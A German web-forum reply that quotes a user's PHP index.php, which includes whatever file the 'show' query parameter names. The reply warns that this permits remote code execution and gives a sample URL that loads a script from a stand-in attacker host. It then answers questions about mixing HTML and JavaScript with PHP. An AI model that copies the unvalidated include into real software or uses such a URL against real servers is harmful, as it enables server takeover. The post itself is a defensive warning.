Hallo,

das ist meine index.php:

<?php

$filename = $_GET['show'];

if($filename == ""){
include("home.php");
}else{
include("".$filename.".php");
}

?>

  
klasse, damit kann ich jeden beliebigen PHP-Code auf deinem Server ausführen und so deinen Server/Webspace ausspähen, in deinem Dateibestand wüten, meine eigenen Daten ablegen:  
  
 http://your.example.org/?show=http%3A%2F%2Fmy.example.org%2Fevil-script  
  
Du solltest UNBEDINGT den übergebenen Parameter daraufhin überprüfen, ob er einen in deinem Sinn gültigen Wert hat! Eine Prüfung auf Vorhandensein bzw. Leerstring genügt nicht!  
  

> und die managet die seiten... deshalb die html wüste!  
  
Das ist überhaupt keine Erklärung für die "HTML-Wüste", hat damit gar nichts zu tun. Wer sagt, dass du in der include-Datei wieder alles in einen PHP-Anweisungsblock schreiben musst?  
  

> doch ich fragt wie ich das java script integriere!  
  
Und genau dazu hat suit dir (indirekt) einen guten Rat gegeben: Schreib den Code ganz normal als HTML runter, und setze  einen PHP-Block nur dort, wo du es unbedingt brauchst.  
  
So long,  
 Martin  

-- 
Noch Fragen? - Ich weiß es auch nicht.